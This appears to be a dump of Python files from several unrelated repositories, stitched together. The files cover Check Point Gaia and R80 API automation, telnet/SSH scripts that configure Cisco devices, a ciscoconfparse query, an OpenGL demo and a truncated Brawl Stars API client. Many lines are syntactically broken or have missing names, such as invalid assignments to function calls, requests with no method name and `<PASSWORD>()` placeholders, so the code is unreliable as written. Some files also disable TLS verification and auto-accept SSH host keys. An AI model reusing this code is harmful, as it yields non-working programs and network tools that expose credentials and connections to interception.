filled up, if not do interactive mode if args.user == None and args.version == None and args.path == None: print("###############################", "Check Point GAiA API connector, interactive mode for Gaia OS modification via API", "", "XXXXXXXXXX Training version for ihr XXXXXXXXXXXX", "There is a log file: logcp_gaia_api.elg in the same folder as this script, check it if something goes wrong ", "", "This script takes json data [keys node1,node2,single in XXX.json are mandatory!] -> respect general GAiA API calls -> for other keys and payloads for that call consult gaia API reference", "", "!!!!! IF you do not want to use interactive mode, just hit ctrl+c and run python -h !!!!", "", "If you want to see supported json format, run -jh TRUE ", "", "###############################", sep="\n") self.user=input("Enter API/GUI user name with write permissions: ") self.password=getpass.getpass() self.version=input("Is this single GW or Cluster?\n Type: [single] for single GW or [cluster] for cluster GW:") if self.version == "single": try: self.version='single' self._single() = self._load_data() print ("") print ("#########################################") print ("Running on single node: {}".format(self.IP)) try: Operate_CP(['single'],self.connector).run() except Exception as e: raise Exception("json data issue, single, interactive..") print ("#########################################") print ("") except Exception as e: print ("issue when calling single gw from interactive mode in run() method : {}".format(e)) raise Exception ("Clean up in progress in progress") elif self.version == "cluster": try: self.version='cluster' self._cluster() = self._load_data() print ("") print ("#########################################") print ("Running on node: {}".format(self.node1IP)) try: Operate_CP(['node1'],self.connectors[0]).run() except Exception as e: raise Exception("json data issue, cluster, interactive..") print ("#########################################") print ("") print ("") print ("#########################################") print ("Running on node: {}".format(self.node2IP)) try: Operate_CP(['node2'], self.connectors[1]).run() except Exception as e: raise Exception("json data issue, cluster, interactive..") print ("#########################################") print ("") except Exception as e: print ("issue when calling cluster from interactive mode in run() method : {}".format(e)) raise Exception ("Clean up in progress") else: print ("") print ("") print ("You were asked for something, your input was wrong, now you have to start again :P\n Press ctrl+c for exit") print ("") print ("") # non interactive mode here else: if args.user == None or args.version == None or args.path == None : print ("migging arguments, run -h option") else: self.user = args.user self.password = <PASSWORD>() self.version = args.version self.path = args.path if self.version == "single": if args.single == None: print ("migging or wrong arguments, run -h option") else: try: self.IP = args.single self._single(self.IP) = self._load_data(self.path) print ("") print ("#########################################") print ("Running on node: {}".format(self.IP)) try: Operate_CP(['single'],self.connector).run() except Exception as e: raise Exception ("json data issue, single, non-interactive..") print ("#########################################") print ("") except Exception as e: print ("issue when calling single gw from non-interactive mode in run() method : {}".format(e)) raise Exception ("Clean up in progress") else: if args.node1 == None and args.node2 == None: print ("migging or wrong arguments, run -h option") else: try: self.node1IP = args.node1 self.node2IP = args.node2 self._cluster(self.node1IP, self.node2IP) = self._load_data(self.path) try: print ("") print ("#########################################") print ("Running on node: {}".format(self.node1IP)) Operate_CP(['node1'],self.connectors[0]).run() print ("#########################################") print ("") print ("") print ("##########################################") print ("Running on node: {}".format(self.node2IP)) Operate_CP(['node2'], self.connectors[1]).run() print ("#########################################") print ("") except Exception as e: raise Exception ("json data issue, cluster, non-interactive..") except Exception as e: print ("issue when calling cluster from non-interactive mode in run() method : {}".format(e)) raise Exception ("Clean up in progress") except KeyboardInterrupt: print ("\n ctrl+c pressed, exit..") # if there is no connector just leave try: self.connector.logout() sys.exit(1) except: try: for item in self.connectors: item.logout() sys.exit(1) except: sys.exit(1) except Exception as e: print ("\n Interactive_Init_Handler().run() error: {}".format(e)) # if there is no connector just leave try: self.connector.logout() sys.exit(1) except: try: for item in self.connectors: item.logout() sys.exit(1) except: sys.exit(1) ######## Class############ class Operate_CP(): """ data are extracted here and send against Gaia API """ def __init__(self, data:list, connector:object) -> None: = data self.connector = connector def run(self): try: check_msg02_sent = False # check if special error msg has been displayed for cmd in # every item in is like a call with payload keys = list(cmd.keys()) # I need keys since I do not know what is there - key is api call i=0 # aka first key in keys list for item in keys: try: if i > 0: # if there is more keys in dict, finsh, this is unsupported format for this script raise Exception ("Unsupported json format for this script") except Exception as e: print ("Operate_CP().run() issue: {}!! \n {}".format(e, Error_Msg().display2())) check_msg02_sent = True # msg has been send, set check raise Exception ("Unsupported json format for this script") else: print ("#####################################") print ("running API call:{}".format(keys[i])) if keys[i] =="run-script": #run script has special method because output is encoded in base64 format for item in cmd[keys[i]]:# for every item in apicall -> {"apicall": [{payload}, payload]} -> run the payload against API print ("") print ("payload:\n {}".format(item)) print ("result: {}".format(self.connector.run_script(item))) print ("") else: for item in cmd[keys[i]]:# for every item in apicall -> {"apicall": [{payload}, payload]} -> run the payload against API print ("") print ("payload:\n {}".format(item)) print ("result: {}".format(json.dumps(self.connector.send_cmd(keys[i],item), indent=4, sort_keys=True))) print ("") print ("#######################################") i+=1 except Exception as e: if check_msg02_sent == False: print ("Operate_CP().run() issue: Follow right json data format for this script!! \n {}".format(Error_Msg().display())) raise Exception ("Unsupported json format for this script") ######## Class############ class Error_Msg(): def __init__(self) -> None: pass def display2(self): return ("""Make sure you have right format:\n You defined just one item in node1 list and rest as part of dict -->\n [{"cmd1":[{payload_data01}, {payload-data02}], "cmd2":[{payload_data01}, {payload-data02}]}] this format is not supported... \n be really careful, you can owerwrite your data (eth1.11 overwritten by eth1.20) if you do something like this since in python dict :\n "node1": [ {"delete-vlan-interface":[ {"name":"eth1.11"}, {"name":"eth1.12"}, {"name":"eth1.13"}, {"name":"eth1.14"}], "add-vlan-interface":[ {"parent":"eth1","id":11, "ipv4-address":"", "ipv4-mask-length":24}, {"parent":"eth1","id":12, "ipv4-address":"", "ipv4-mask-length":24}, {"parent":"eth1","id":13, "ipv4-address":"", "ipv4-mask-length":24}, {"parent":"eth1","id":14, "ipv4-address":"", "ipv4-mask-length":24}], "delete-vlan-interface":[ {"name":"eth1.20"}, {"name":"eth1.12"}, {"name":"eth1.13"}, {"name":"eth1.14"}] } ], "node2":[ {XXX} ] "single":[ {XXX} ] } """) def display(self): return (""" Make sure you have right format:\n Keys node1, node2, single are mandatory!\n define as dedicated item in node1[] list -->\n [{"apiCall":[{payload_data01}, {payload-data02}]},{"apiCall":[{payload_data01}, {payload-data02}]}] prefered format!!! { "node1": [ {"add-vlan-interface":[ {"parent":"eth1","id":11, "ipv4-address":"", "ipv4-mask-length":24}, {"parent":"eth1","id":12, "ipv4-address":"", "ipv4-mask-length":24}, {"parent":"eth1","id":13, "ipv4-address":"", "ipv4-mask-length":24}, {"parent":"eth1","id":14, "ipv4-address":"", "ipv4-mask-length":24}]}, {"add-vlan-interface":[ {"parent":"eth1","id":11, "ipv4-address":"", "ipv4-mask-length":24}, {"parent":"eth1","id":12, "ipv4-address":"", "ipv4-mask-length":24}, {"parent":"eth1","id":13, "ipv4-address":"", "ipv4-mask-length":24}, {"parent":"eth1","id":14, "ipv4-address":"", "ipv4-mask-length":24}]} ], "node2": [ {XXX}, {XXX} ], "single":[ {XXX}, {XXX} ] } if you are using cluster, define node1 and node2, but leave single in json file as follow: "single":[] same for case you are running via single, just leave node1, node2 lists empty but keep the keys!!! """) ######## Class############ class Load_Data(): def __init__(self, path='data.json') -> None: self.path = path def _validate_data(self, data) -> bool: try: if 'node1' in data and 'node2' in data and 'single' in data: return True except Exception as e: print ("There is wrong data format: {} gateway".format(e)) return False def load_data(self) -> dict: try: with open(self.path) as f: data = json.load(f) if self._validate_data(data): if data == None: raise Exception(Error_Msg().display()) else: return data else: raise Exception(Error_Msg().display()) except Exception as e: print ("Can not load data, make sure path to data.json is right or json is in same folder as script, make sure your format is right: {}".format(e)) print(Error_Msg().display()) ######## Class############ def handler(signum, frame): """ just handling if someone press ctrl+z """ print ("Ctrl+Z pressed, but ignored") def main(): """ main method where all starts enjoy! ihr.. """ try: current_path=(os.path.dirname(os.path.abspath(__file__))) log='{0}/gaia_api_connector.elg'.format(current_path) os.remove(log) except Exception as e: pass signal.signal(signal.SIGTSTP, handler) run = Interactive_Init_Handler() if __name__ == "__main__": main() ```
{ "source": "0dadj1an/mix", "score": 3 }
#### File: KirkB-Automation/namespaces/ ```python x=10 y=20 z=30 def namespace01(): def namespace02(): x=0.5 print x print y print z x=1 y=2 print x print y print z namespace02() namespace01() print x print y print z ``` #### File: KirkB-Automation/paramiko_netmiko/ ```python import telnetlib import time import socket import sys TIMEOUT = 6 TELNET_PORT = 23 class ConnectDevice02(object): def __init__(self, ip, username, password): self.ip = ip self.username = username self.password = password try: self.connection = telnetlib.Telnet(self.ip, TELNET_PORT, TIMEOUT) except socket.timeout: sys.exit("Unable to connect due timeout") self.telnetLogin() def telnetSend(self, command): command = command.rstrip() self.connection.write(command + '\n') time.sleep(1) return self.connection.read_very_eager() def telnetLogin(self): output = self.connection.read_until("sername:", TIMEOUT) self.connection.write(self.username +'\n') output = output + self.connection.read_until("ssword:", TIMEOUT) self.connection.write(self.password +'\n') return output def telnetClose(): self.connection.close() def main(): ip_add = raw_input("write IP" + '\n') username = raw_input("write username" + '\n') password = raw_input("write password" + '\n') new_connection = ConnectDevice02(ip_add, username, password) new_connection.telnetSend('terminal length 0') new_connection.telnetSend('show version') new_connection.telnetClose() ``` #### File: python_bundle_1_2/mgmt_api_lib/ ```python class APIException(Exception): def __init__(self, value): self.value = value def __str__(self): return str(self.value) class APIClientException(APIException): pass ```
{ "source": "0dadj1an/pynet", "score": 3 }
#### File: pynet/ciscoconfparse/ ```python import re from ciscoconfparse import CiscoConfParse parse = CiscoConfParse("/home/hrb/github/pynet/ciscoconfparse/config.txt") objects = parse.find_objects("^crypto map CRYPTO") objects2 = parse.find_objects_wo_child(parentspec=r"crypto map CRYPTO", childspec=r"AES") def findParentAndChildern(): for obj in objects: print "Parent is:" print obj.text print"" parent = objects[objects.index(obj)] list_a= parent.children print "Childerns are:" for child in list_a: print child.text print"" def findPFSgroup2(): print "#################" print "CRYPTO maps with PFSgroup2 are:\n" for obj in objects: if obj.re_search_children(r"set pfs group2"): print obj.text print"" def findNOTAES(): print "#################" print "CRYPTO maps with NO AES:\n" for obj in objects2: for child in obj.children: if 'transform' in child.text: pattern ="set transform-set (.*)$", child.text) transform_set = print "{0} and transform set is: {1}".format(obj.text, transform_set) def main(): findParentAndChildern() findPFSgroup2() findNOTAES() if __name__ == '__main__': main() ``` #### File: pynet/paramiko_netmiko/ ```python import time import paramiko from getpass import getpass def disablePaging(connection): '''disable paging by entering terminal lenght''' connection.send("terminal length 0\n") time.sleep(1) output = connection.recv(1000) return output def showVersion(connection): ''' method for showing the version ''' connection.send("show version\n") time.sleep(1) output = connection.recv(5000) return output def enterConfig(connection): '''congig mode method ''' connection.send("conf t\n") time.sleep(1) output = connection.recv(5000) return output def loginBuffered(connection): ''' changing login buffer ''' connection.send("loggin buffered 65000\n") time.sleep(1) output = connection.recv(5000) return output def showRun(connection): ''' show run ''' connection.send("show run\n") time.sleep(1) output = connection.recv(5000) return output def exitFromConf(connection): ''' exit from conf t mode ''' connection.send("exit\n") time.sleep(1) output = connection.recv(5000) return output def main(): ip = '' username = 'pyclass' password = get<PASSWORD>() remote_conn=paramiko.SSHClient() # avoid issues with not trusted targets remote_conn.set_missing_host_key_policy(paramiko.AutoAddPolicy()) remote_conn.connect(ip, username=username, password=password, look_for_keys=False, allow_agent=False) #invoke shell means you can send commands more times remote_conn02 = remote_conn.invoke_shell() disablePaging(remote_conn02) enterConfig(remote_conn02) loginBuffered(remote_conn02) exitFromConf(remote_conn02) output = showRun(remote_conn02) print output if __name__ == "__main__": main() ``` #### File: pynet/paramiko_netmiko/ ```python import pexpect import sys import time def main(): ip = '' username = 'pyclass' password = '' port = 8022 remote_conn = pexpect.spawn('ssh -l {} {} -p {}'.format(username, password, port)) remote_conn02 = pexpect.spawn() remote_conn.timeout = 3 remote_conn.expect('ssword:') remote_conn.sendline(password) remote_conn.expect('#') remote_conn.sendline('show ip int brief') remote_conn.expect('#') remote_conn.sendline('conf t') remote_conn.expect('#') remote_conn.sendline('loggin buffered 65000') remote_conn.expect('#') remote_conn.sendline('exit') remote_conn.expect('#') remote_conn.sendline('show run') remote_conn.expect('#') print remote_conn.before if __name__ == "__main__": main() ``` #### File: pynet/telnetlib/ ```python import telnetlib import time import socket import sys class ConnectDevice02(object): def __init__(self, ip, username, password): self.ip = ip self.username = username self.password = password self.timeout = 6 self.port =23 try: self.connection = telnetlib.Telnet(self.ip, self.port, self.timeout) except socket.timeout: sys.exit("Unable to connect due timeout") self.telnetLogin() self.telnetSend("terminal length 0") def telnetSend(self, command): command = command.rstrip() self.connection.write(command + '\n') time.sleep(1) return self.connection.read_very_eager() def telnetLogin(self): output = self.connection.read_until("sername:", self.timeout) if output: self.connection.write(self.username +'\n') else: print "Not possible to add username" output = output + self.connection.read_until("ssword:", self.timeout) if output: self.connection.write(self.password +'\n') else: print "Not possible to add username" #print output def telnetClose(self): self.connection.close() def main(): ip_add = raw_input("write IP" + '\n') username = raw_input("write username" + '\n') password = raw_input("write password" + '\n') command = raw_input("enter command to be executed" + '\n') new_connection = ConnectDevice02(ip_add, username, password) output = new_connection.telnetSend("terminal length 0") output = new_connection.telnetSend(command) print output new_connection.telnetClose() if __name__ == "__main__": main() ```
{ "source": "0dadj1an/r80python", "score": 3 }
#### File: 0dadj1an/r80python/ ```python import requests import json import pprint #remove https warning requests.packages.urllib3.disable_warnings() #url = "" #user = "api_user" #pw = "<PASSWORD>" def login(url,user,pw): payload_list={} payload_list['user']=user payload_list['password']=pw headers = { 'content-type': "application/json", 'Accept': "*/*", } response ="login", json=payload_list, headers=headers, verify=False) return response def add_host(sid,url,name,ip_address,groups="",comments="",nat_settings=""): payload_list={} payload_list['name']=name payload_list['ipv4-address']= ip_address if nat_settings != "": payload_list['nat-settings']= nat_settings if groups != "" : payload_list['groups']= groups if comments != "": payload_list['comments']= comments headers = { 'content-type': "application/json", 'Accept': "*/*", 'x-chkp-sid': sid, } print payload_list response ="add-host", json=payload_list, headers=headers, verify=False) return response.json() def delete_host(sid,url,name): payload_list={} payload_list['name']=name payload_list['ignore-warnings']="true" headers = { 'content-type': "application/json", 'Accept': "*/*", 'x-chkp-sid': sid, } response ="delete-host", json=payload_list, headers=headers, verify=False) return response def add_network(sid,url,name,subnet,mask_length,nat_settings,groups): payload_list={} payload_list['name']=name payload_list['subnet4']= subnet payload_list['mask-length']= mask_length payload_list['nat-settings']= nat_settings payload_list['groups']= groups headers = { 'content-type': "application/json", 'Accept': "*/*", 'x-chkp-sid': sid, } response ="add-network", json=payload_list, headers=headers, verify=False) return response.json() def delete_network(sid,url,name): payload_list={} payload_list['name']=name headers = { 'content-type': "application/json", 'Accept': "*/*", 'x-chkp-sid': sid, } response ="delete-network", json=payload_list, headers=headers, verify=False) return response def show_network_groups(sid,url): payload_list={} payload_list['details-level']="standard" headers = { 'content-type': "application/json", 'Accept': "*/*", 'x-chkp-sid': sid, } response ="show-groups", json=payload_list, headers=headers, verify=False) groups=json.loads(response.text) return groups def add_network_group(sid,url,name): payload_list={} payload_list['name']=name headers = { 'content-type': "application/json", 'Accept': "*/*", 'x-chkp-sid': sid, } response ="add-group", json=payload_list, headers=headers, verify=False) return response def add_members_to_network_group(sid,url,members): payload_list={} payload_list['name']=name payload_list['members']=members headers = { 'content-type': "application/json", 'Accept': "*/*", 'x-chkp-sid': sid, } response ="set-group", json=payload_list, headers=headers, verify=False) return response def add_access_layer(sid,url,name): payload_list={} payload_list['name']=name headers = { 'content-type': "application/json", 'Accept': "*/*", 'x-chkp-sid': sid, } response ="add-access-layer", json=payload_list, headers=headers, verify=False) return response def add_policy_package(sid,url,name,access_layer,threat_layer,comments): payload_list={} payload_list['name']=name payload_list['access']=access_layer payload_list['threat-prevention']=threat_layer payload_list['comments']=comments headers = { 'content-type': "application/json", 'Accept': "*/*", 'x-chkp-sid': sid, } response ="add-package", json=payload_list, headers=headers, verify=False) return response def add_access_section(sid,url,layer,position,name): payload_list={} payload_list['layer']=layer payload_list['position']=position payload_list['name']=name headers = { 'content-type': "application/json", 'Accept': "*/*", 'x-chkp-sid': sid, } response ="add-access-section", json=payload_list, headers=headers, verify=False) return response def delete_access_section_by_name(sid,url,layer,name): payload_list={} payload_list['name']=name payload_list['layer']=layer headers = { 'content-type': "application/json", 'Accept': "*/*", 'x-chkp-sid': sid, } response ="delete-access-section", json=payload_list, headers=headers, verify=False) return response def show_access_section(sid,url,layer,name): payload_list={} payload_list['layer']=layer payload_list['name']=name headers = { 'content-type': "application/json", 'Accept': "*/*", 'x-chkp-sid': sid, } response ="show-access-section", json=payload_list, headers=headers, verify=False) return response def add_access_rule(sid,url,layer,position,rule): payload_list={} payload_list['layer']=layer payload_list['position']=position payload_list['name']=rule['name'] payload_list['source']=rule['source'] payload_list['destination']=rule['destination'] payload_list['service']=rule['service'] payload_list['track']=rule['track'] payload_list['action']=rule['action'] headers = { 'content-type': "application/json", 'Accept': "*/*", 'x-chkp-sid': sid, } response ="add-access-rule", json=payload_list, headers=headers, verify=False) return response def delete_access_rule_by_rule_number(sid,url,layer,number): payload_list={} payload_list['layer']=layer payload_list['rule-number']=number headers = { 'content-type': "application/json", 'Accept': "*/*", 'x-chkp-sid': sid, } response ="delete-access-rule", json=payload_list, headers=headers, verify=False) return response def delete_access_rule_by_rule_name(sid,url,layer,name): payload_list={} payload_list['layer']=layer payload_list['name']=name headers = { 'content-type': "application/json", 'Accept': "*/*", 'x-chkp-sid': sid, } response ="delete-access-rule", json=payload_list, headers=headers, verify=False) return response def publish(sid,url): payload_list={} headers = { 'content-type': "application/json", 'Accept': "*/*", 'x-chkp-sid': sid, } response ="publish", json=payload_list, headers=headers, verify=False) return response def add_range(): payload_list={} headers = { 'content-type': "application/json", 'Accept': "*/*", 'x-chkp-sid': sid, } response ="publish", json=payload_list, headers=headers, verify=False) return response def show_task(sid,url,task): payload_list={} payload_list['task-id']=task headers = { 'content-type': "application/json", 'Accept': "*/*", 'x-chkp-sid': sid, } response ="show-task", json=payload_list, headers=headers, verify=False) return response def logout(sid,url): payload_list={} headers = { 'content-type': "application/json", 'Accept': "*/*", 'x-chkp-sid': sid, } response ="logout", json=payload_list, headers=headers, verify=False) return response #main program #login and get the session id #sid=login(url,user,pw) #get all groups #add policy package #name="my_cpx_policy2" #comments="created by automation script" #access_layer="true" #threat_layer="true" #package_return=add_policy_package(sid,url,name,access_layer,threat_layer,comments) #print package_return #add access rule section #layer="my_cpx_policy2 network" #position="top" #position={"above":"Cleanup rule"} #name="section1 - created by automation2" #show_section_return=show_access_section(sid,url,layer,name) #show_section_return=show_access_section(sid,url,layer,name) #if show_section_return.status_code == "200": # print "section already exists skipping" #else: # add_access_section(sid,url,layer,position,name) #add access rule #layer="my_cpx_policy2 network" #position="top" #rule={} #rule['source']="any" #rule['destination']="any" #rule['service']="http" #rule['action']="accept" #rule['track']="Network Log" #rule['name']="my rule 1" #rule_response=add_access_rule(sid,url,layer,position,rule) #print json.loads(rule_response.text) #print rule_response #add access rule to section #layer="my_cpx_policy2 network" #position={"top":"section1 - created by automation"} #rule={} #rule['source']="any" #rule['destination']="any" #rule['service']=["https","http"] #rule['action']="accept" #rule['track']="Network Log" #rule['name']="my rule 2" #rule_response=add_access_rule(sid,url,layer,position,rule) #print rule_response #print json.loads(rule_response.text) #publish #publish(sid,url) ```
{ "source": "0dj0bz/hn-vis", "score": 3 }
#### File: hn-vis/openGL/ ```python import OpenGL.GL as GL import OpenGL.GL.shaders import ctypes import pygame import numpy vertex_shader = """ #version 330 in vec4 position; void main() { gl_Position = position; } """ fragment_shader = """ #version 330 void main() { gl_FragColor = vec4(1.0f, 1.0f, 1.0f, 1.0f); } """ vertices = [ 0.6, 0.6, 0.0, 1.0, -0.6, 0.6, 0.0, 1.0, 0.0, -0.6, 0.0, 1.0] vertices = numpy.array(vertices, dtype=numpy.float32) def create_object(shader): # Create a new VAO (Vertex Array Object) and bind it vertex_array_object = GL.glGenVertexArrays(1) GL.glBindVertexArray( vertex_array_object ) # Generate buffers to hold our vertices vertex_buffer = GL.glGenBuffers(1) GL.glBindBuffer(GL.GL_ARRAY_BUFFER, vertex_buffer) # Get the position of the 'position' in parameter of our shader and bind it. position = GL.glGetAttribLocation(shader, 'position') GL.glEnableVertexAttribArray(position) # Describe the position data layout in the buffer GL.glVertexAttribPointer(position, 4, GL.GL_FLOAT, False, 0, ctypes.c_void_p(0)) # Send the data over to the buffer GL.glBufferData(GL.GL_ARRAY_BUFFER, 48, vertices, GL.GL_STATIC_DRAW) # Unbind the VAO first (Important) GL.glBindVertexArray( 0 ) # Unbind other stuff GL.glDisableVertexAttribArray(position) GL.glBindBuffer(GL.GL_ARRAY_BUFFER, 0) return vertex_array_object def display(shader, vertex_array_object): GL.glClear(GL.GL_COLOR_BUFFER_BIT | GL.GL_DEPTH_BUFFER_BIT) GL.glUseProgram(shader) GL.glBindVertexArray( vertex_array_object ) GL.glDrawArrays(GL.GL_TRIANGLES, 0, 3) GL.glBindVertexArray( 0 ) GL.glUseProgram(0) def main(): pygame.init() screen = pygame.display.set_mode((512, 512), pygame.OPENGL|pygame.DOUBLEBUF) GL.glClearColor(0.5, 0.5, 0.5, 1.0) GL.glEnable(GL.GL_DEPTH_TEST) shader = OpenGL.GL.shaders.compileProgram( OpenGL.GL.shaders.compileShader(vertex_shader, GL.GL_VERTEX_SHADER), OpenGL.GL.shaders.compileShader(fragment_shader, GL.GL_FRAGMENT_SHADER) ) vertex_array_object = create_object(shader) clock = pygame.time.Clock() while True: for event in pygame.event.get(): if event.type == pygame.QUIT: return if event.type == pygame.KEYUP and event.key == pygame.K_ESCAPE: return display(shader, vertex_array_object) pygame.display.flip() if __name__ == '__main__': try: main() finally: pygame.quit() ```
{ "source": "0dminnimda/brawlpython", "score": 2 }
#### File: brawlpython/brawlpython/ ```python from . import __version__, __name__ from .typedefs import STRDICT from .cache_utils import somecachedmethod, iscorofunc from asyncio import ensure_future as ensure, gather from import ByteString, Collection, Mapping, Sized from functools import update_wrapper import sys from typing import Dict, Union __all__ = ( "default_headers", "make_headers", "isliterals", "iscollection", "issized", "isunit", "isempty", "ismapping", "isrequiredcollection", "same", "unique", "prepare_param", "check_params", "_rearrange_params", "rearrange_params", "_rearrange_args", "rearrange_args", "multiparams", "add_api_name") def default_headers() -> STRDICT: return { "dnt": "1", "user-agent": f"{__name__}/{__version__} (Python {sys.version[:5]})", "accept-encoding": ", ".join(("gzip", "deflate")), "cache-control": "no-cache", "pragma": "no-cache", # "content-encoding": "utf-8", } def make_headers(api_key: str) -> STRDICT: return {"authorization": f"Bearer {api_key}"} def isliterals(obj): return isinstance(obj, (str, ByteString)) def iscollection(obj): return isinstance(obj, Collection) def issized(obj): return isinstance(obj, Sized) def isunit(obj): return issized(obj) and len(obj) == 1 def isempty(obj): return issized(obj) and len(obj) == 0 def ismapping(obj): return isinstance(obj, Mapping) def isrequiredcollection(obj): return ( iscollection(obj) and not isliterals(obj) and not ismapping(obj) and not isempty(obj)) def same(elements): return len(elements) == elements.count(elements[0]) def unique(x): seen = list() return not any(i in seen or seen.append(i) for i in x) def prepare_param(param, lengths): if isrequiredcollection(param): if isunit(param): return ("u", param[0]) else: lengths.append(len(param)) return ("m", iter(param)) else: return ("u", param) def check_params(args, kwargs): lengths = [] args = [prepare_param(param, lengths) for param in args] kwargs = { key: prepare_param(param, lengths) for key, param in kwargs.items()} if len(lengths) < 1: total_length = 1 else: if not same(lengths): raise ValueError( "All allowed iterable parameters must be of the same length.") total_length = lengths[0] return args, kwargs, total_length def _rearrange_params(args, kwargs): new_args, new_kwargs, length = check_params(args[:], kwargs.copy()) for _ in range(length): current_args = [] for (kind, val) in new_args: if kind == "m": val = next(val) current_args.append(val) current_kwargs = {} for key, (kind, val) in new_kwargs.items(): if kind == "m": val = next(val) current_kwargs[key] = val yield tuple(current_args), current_kwargs def rearrange_params(*args, **kwargs): return _rearrange_params(args, kwargs) def _rearrange_args(args): for a, kw in _rearrange_params(args, {}): yield a def rearrange_args(*args): return _rearrange_args(args) def multiparams(func): if iscorofunc(func): async def wrapper(*args, **kwargs): params = _rearrange_params(args, kwargs) tasks = [ensure(func(*a, **kw)) for a, kw in params] return await gather(*tasks) else: def wrapper(*args, **kwargs): params = _rearrange_params(args, kwargs) return [func(*a, **kw) for a, kw in params] return update_wrapper(wrapper, func) ``` #### File: brawlpython/brawlpython/ ```python import asyncio from .api import ( default_api_dict, API, KINDS, KIND_VALS, KIND_KEYS, OFFIC, CHI, STAR, OFFICS, UNOFFICS, ) from .api_toolkit import rearrange_params, _rearrange_args from .base_classes import AsyncInitObject, AsyncWith, SyncWith from .cache_utils import iscorofunc from .sessions import AsyncSession, SyncSession from configparser import ConfigParser from functools import update_wrapper from types import TracebackType from typing import ( Any, Callable, Coroutine, Dict, Generator, Iterable, Generic, List, Mapping, Optional, Sequence, Set, Tuple, Type, TypeVar, Union, ) from .typedefs import (STRS, JSONSEQ, JSONS, HANDLER, NUMBER, INTSTR, BOOLS, STRDICT, AKW) import time __all__ = ( "AsyncClient", "SyncClient", "offic_gets_handler", "star_gets_handler", "gets_handler") COLLECT = "collect" RELEASE = "release" DEFAULT = "default" def offic_gets_handler(data_list: JSONSEQ) -> JSONSEQ: results = [] for data in data_list: get_items = data.get("items") if get_items is not None and isinstance(get_items, list): results.append(get_items) else: results.append(data) return results def star_gets_handler(data_list: JSONSEQ) -> JSONSEQ: results = [] for data in data_list: data.pop("status", None) if len(data) == 1: results += list(data.values()) else: results.append(data) return results def gets_handler(self, data_list: JSONSEQ) -> JSONSEQ: name = self._current_api if name in OFFICS: res = offic_gets_handler(data_list) elif name == STAR: res = star_gets_handler(data_list) else: res = data_list if self._return_unit and len(res) == 1: return res[0] return res def _find_save(self, kind: str, match: INTSTR, parameter: str = None) -> Optional[JSONS]: collectable = self._saves[kind] count = len(collectable) if isinstance(match, int): if -count <= match < count: return collectable[match] elif isinstance(match, str): match = match.upper() if parameter is None: for part in collectable: if match in part.values(): return part else: for part in collectable: if part.get(parameter) == match: return part return None # returns explicitly def _rankings(self, kind: str, api: str, key: Optional[INTSTR] = None, code: str = "global", limit: INTSTR = 200) -> JSONS: if kind in KIND_KEYS: kind = KINDS[kind] if kind == KINDS["b"]: if key is None: raise ValueError( "If the kind is b or brawlers, the key must be entered") brawler = self.find_save("b", key) if brawler is not None: key = brawler["id"] elif kind == KINDS["ps"]: if key is None: key = -1 powerplay = self.find_save("ps", key) if powerplay is not None: key = powerplay["id"] if key is None: key = "" return ("rankings",), {"code": code, "kind": kind, "id": key, "limit": limit} def get_and_apply_api_keys(filename: str, section: str, api_dict: Dict[str, API]) -> None: if filename.endswith(".env"): raise ValueError("this file extension is not accepted") # if filename.endswith(".ini"): config = ConfigParser() config = config[section] for name, api in api_dict.items(): if name in OFFICS: name = OFFIC api_key = config.get(name + "_api_key") api.set_api_key(api_key) class AsyncClient(AsyncInitObject, AsyncWith): _gets_handler = gets_handler async def __init__( self, # api_keys: Union[str, STRDICT], config_file_name: str = "config.ini", section: str = "DEFAULT", api_dict: Dict[str, API] = {}, default_api: str = OFFIC, return_unit: bool = True, min_update_time: NUMBER = 60 * 10, data_handler: HANDLER = gets_handler, trust_env: bool = True, cache_ttl: NUMBER = 60, cache_limit: int = 1024, use_cache: bool = True, timeout: NUMBER = 30, repeat_failed: int = 3) -> None: self.session = await AsyncSession( trust_env=trust_env, cache_ttl=cache_ttl, cache_limit=cache_limit, use_cache=use_cache, timeout=timeout, repeat_failed=repeat_failed) self.api_dict = {**default_api_dict, **api_dict} get_and_apply_api_keys(config_file_name, section, self.api_dict) self._current_api = self._default_api = default_api self._return_unit = return_unit self._gets_handler = data_handler self._requests = [] self._mode = DEFAULT self._saves = {} self._min_update_time = min_update_time await self.update_saves(True) async def close(self) -> None: """Close session""" await self.session.close() @property def closed(self) -> bool: """Is client session closed. A readonly property. """ return self.session.closed async def _gets(self, *args) -> JSONSEQ: # not_collect = resps = await self.session.gets(*args) if self.session.mode != COLLECT: return self._gets_handler(resps) if self.session.mode == RELEASE: return resps # None def _get_api(self, api: str): return self.api_dict[api] async def _fetchs(self, paths: STRS, api_names: str, from_json: BOOLS = True, rearrange: bool = True, **kwargs) -> JSONS: if rearrange: urls = [] headers = [] pars = rearrange_params(api_names, paths, **kwargs) for (api_name, *a), kw in pars: api = self._get_api(api_name) urls.append(api.make_url(*a, **kw)) headers.append( (api.headers)) # self.session.headers_handler else: api = self._get_api(api_names) urls = api.make_url(paths, **kwargs) headers = self.session.headers_handler(api.headers) return await self._gets(urls, from_json, headers) def collect(self): self.session.collect() async def release(self): return self._gets_handler(await self.session.release()) # @add_api_name(None) async def test_fetch(self, *args, **kwargs): return await self._fetchs(*args, **kwargs) async def players(self, tag: str, api: str = OFFIC) -> JSONS: return await self._fetchs("players", api, tag=tag) async def battlelog(self, tag: str, api: str = OFFIC) -> JSONS: return await self._fetchs("battlelog", api, tag=tag) async def clubs(self, tag: str, api: str = OFFIC) -> JSONS: return await self._fetchs("clubs", api, tag=tag) async def members(self, tag: str, limit: INTSTR = 100, api: str = OFFIC) -> JSONS: return await self._fetchs("members", api, tag=tag, limit=limit) async def rankings(self, kind: str, key: Optional[INTSTR] = None, code: str = "global", limit: INTSTR = 200, api: str = OFFIC) -> JSONS: pars = rearrange_params(kind, api, key=key, code=code, limit=limit) self.collect() for args, kwargs in pars: a, kw = _rankings(self, *args, **kwargs) await self._fetchs(*a, rearrange=False, **kw) return await self.release() async def brawlers(self, id: INTSTR = "", limit: Optional[INTSTR] = None, api: str = OFFIC) -> JSONS: return await self._fetchs("brawlers", api, id=id, limit=limit) async def powerplay(self, code: str = "global", limit: int = 200, api: str = OFFIC) -> JSONS: return await self._fetchs("rankings", api, code=code, limit=limit, kind=KINDS["ps"]) async def events(self, api: str = STAR) -> JSONS: return await self._fetchs("events", api) async def icons(self, api: str = STAR) -> JSONS: return await self._fetchs("icons", api) async def maps(self, id: INTSTR = "", api: str = STAR) -> JSONS: return await self._fetchs("maps", api, id=id) async def gamemodes(self, api: str = STAR) -> JSONS: return await self._fetchs("gamemodes", api) async def clublog(self, tag: str, api: str = 